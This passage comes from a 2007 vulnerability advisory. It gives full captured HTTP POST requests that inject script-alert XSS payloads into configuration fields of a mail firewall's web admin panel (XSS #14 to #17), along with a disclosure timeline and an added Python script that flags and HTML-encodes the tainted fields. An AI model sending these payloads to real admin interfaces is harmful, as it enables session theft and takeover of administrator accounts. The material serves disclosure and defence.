dateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0
&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5
D.langTagId=2016402&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%
27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=sync_rules_order&rows%5B
2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&r
ows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyab
le=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&row
s%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attr
Type=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5
D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&r
ows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D
.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attr
Type=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%
5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%
5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId
=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_in
tvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B
5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.m
ultipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone
=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.
attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidat
e=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1%
5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+
3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%
5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMAT
ION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2
C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A
6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&ro
ws%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.la
ngTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_
aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.at
trValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows
%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.lang
TagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:56 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #14 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP
roperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD
APConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B
0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows
%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=
true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows
%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1
%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrVali
dateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0
&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5
D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=syn
c_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%
5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1
&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.
langTagId=2016403&rows%5B2%5D.attrValue=%27%3E%3Cscript%3Ealert%28%27SIA
%27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.at
trType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3
%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true
&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%
5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.at
trType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr
=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B
4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTag
Id=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_
intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%
5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D
.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClo
ne=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5
D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValid
ate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+
1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2
C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+
5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORM
ATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1
%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%
3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&
rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.
langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_rout
e_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.
attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&ro
ws%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.la
ngTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #15 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=
init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP
roperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD
APConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B
0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows
%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=
true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows
%5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1
%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrVali
dateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0
&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5
D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=syn
c_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%
5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1
&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=%27%3E%3Cscri
pt%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.langTagId=2016403&r
ows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.at
trType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3
%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true
&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%
5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.at
trType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr
=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B
4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTag
Id=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_
intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%
5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D
.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClo
ne=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5
D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValid
ate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+
1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2
C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+
5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORM
ATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1
%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%
3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&
rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.
langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_rout
e_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.
attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&ro
ws%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.la
ngTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #16 ] :.

POST
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method
=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method
=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 100
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRouti
ngInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD
APConfigurationMenu%2CMailRoutingMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
dtype=INBOUND&input1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%
3E&input2=&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #17 ] :.

POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailIdsConfig.do?method=init&isMenuToggled
=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2237
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fmet
hod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc
ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD
APConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMe
nu%2CMailIDSMenu%2CApplicationLevelMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=10&rows%5B0%5D.attrName=pass_monitor&rows%5B0%5D.attrType=5&rows%
5B0%5D.attrValidate=&rows%5B0%5D.attrValidateStr=&rows%5B0%5D.attrDepend
s=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.a
ttrValueStrClone=0&rows%5B0%5D.langTagId=2000006&rows%5B1%5D.attrName=en
able_dos&rows%5B1%5D.attrType=5&rows%5B1%5D.attrValidate=&rows%5B1%5D.at
trValidateStr=&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows
%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=0&rows%5B1%5D.lang
TagId=2000008&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrType=2&ro
ws%5B2%5D.attrValidate=%5B1-65535%5D&rows%5B2%5D.attrValidateStr=%5B1-65
535%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.
modifyable=true&rows%5B2%5D.attrValueStrClone=100&rows%5B2%5D.langTagId=
2001009&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%
3C%2Fscript%3E&rows%5B3%5D.attrName=shm_spamcount&rows%5B3%5D.attrType=2
&rows%5B3%5D.attrValidate=%5B1-65535%5D&rows%5B3%5D.attrValidateStr=%5B1
-65535%5D&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%
5D.modifyable=true&rows%5B3%5D.attrValueStrClone=100&rows%5B3%5D.langTag
Id=2001010&rows%5B3%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27
%29%3C%2Fscript%3E&rows%5B4%5D.attrName=passcrackswitch&rows%5B4%5D.attr
Type=5&rows%5B4%5D.attrValidate=&rows%5B4%5D.attrValidateStr=&rows%5B4%5
D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&r
ows%5B4%5D.attrValueStrClone=0&rows%5B4%5D.langTagId=2004104&rows%5B5%5D
.attrName=passcrackcount&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate
=%5B1-100%5D&rows%5B5%5D.attrValidateStr=%5B1-100%5D&rows%5B5%5D.attrDep
ends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5
D.attrValueStrClone=5&rows%5B5%5D.langTagId=2004105&rows%5B5%5D.attrValu
eStr=%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscript%3E&rows%5B6%5D.
attrName=passtimeout&rows%5B6%5D.attrType=2&rows%5B6%5D.attrValidate=%5B
1-3600%5D&rows%5B6%5D.attrValidateStr=%5B1-3600%5D&rows%5B6%5D.attrDepen
ds=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.
attrValueStrClone=60&rows%5B6%5D.langTagId=2004106&rows%5B6%5D.attrValue
Str=%27%3E%3Cscript%3Ealert%28%27SIA4%27%29%3C%2Fscript%3E&submitValue=S
ubmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:24:22 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ TIMELINE ] :.

22/Mar/2007 - We published the advisory.
07/Mar/2007 - Second contact. Provider didn't answer.
27/Feb/2007 - First contact with provider.
19/Feb/2007 - Vulnerabilities found.
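
Added example (not part of the original advisory, and not vendor code): a triage script that decodes the form bodies of XSS #16 and an excerpt of XSS #17, flags the fields carrying markup-breaking characters, and compares raw and HTML-encoded output. The advisory does not show the response HTML, so the single-quoted input template and the function names are assumptions inferred from the '> prefix of the test string.

```python
import html
import re
from urllib.parse import parse_qsl

# Form bodies from the advisory's requests, rejoined after mail line-wrapping.
BODY_XSS16 = ("dtype=INBOUND&input1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29"
              "%3C%2Fscript%3E&input2=&submitValue=Submit")
# Excerpt of XSS #17 (two of the rows[2] fields only).
BODY_XSS17_EXCERPT = ("rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrValueStr="
                      "%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E")

# Characters that end an attribute value or open a tag when echoed unencoded.
MARKUP_BREAKERS = re.compile(r"[<>\"']")


def flag_parameters(body):
    """Return {name: decoded value} for fields carrying markup-breaking characters."""
    fields = parse_qsl(body, keep_blank_values=True)
    return {name: value for name, value in fields if MARKUP_BREAKERS.search(value)}


def render_field(name, value, encode=True):
    """Render a form field into a hypothetical admin-page template (assumption).

    encode=False reproduces the flaw class: the value is echoed raw into a
    single-quoted attribute. encode=True applies HTML attribute encoding.
    """
    shown = html.escape(value, quote=True) if encode else value
    return "<input type='text' name='%s' value='%s'>" % (
        html.escape(name, quote=True), shown)


def breaks_out(rendered):
    """True if the rendered markup contains a live <script> element."""
    return "<script>" in rendered.lower()


if __name__ == "__main__":
    for body in (BODY_XSS16, BODY_XSS17_EXCERPT):
        for name, value in flag_parameters(body).items():
            print(name, "->", repr(value))
            print("  raw:    ", render_field(name, value, encode=False))
            print("  encoded:", render_field(name, value, encode=True))
```

Encoding at output time covers every field in the 17 requests at once, including hidden fields such as attrValueStrClone that the server would otherwise trust because the form generated them.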
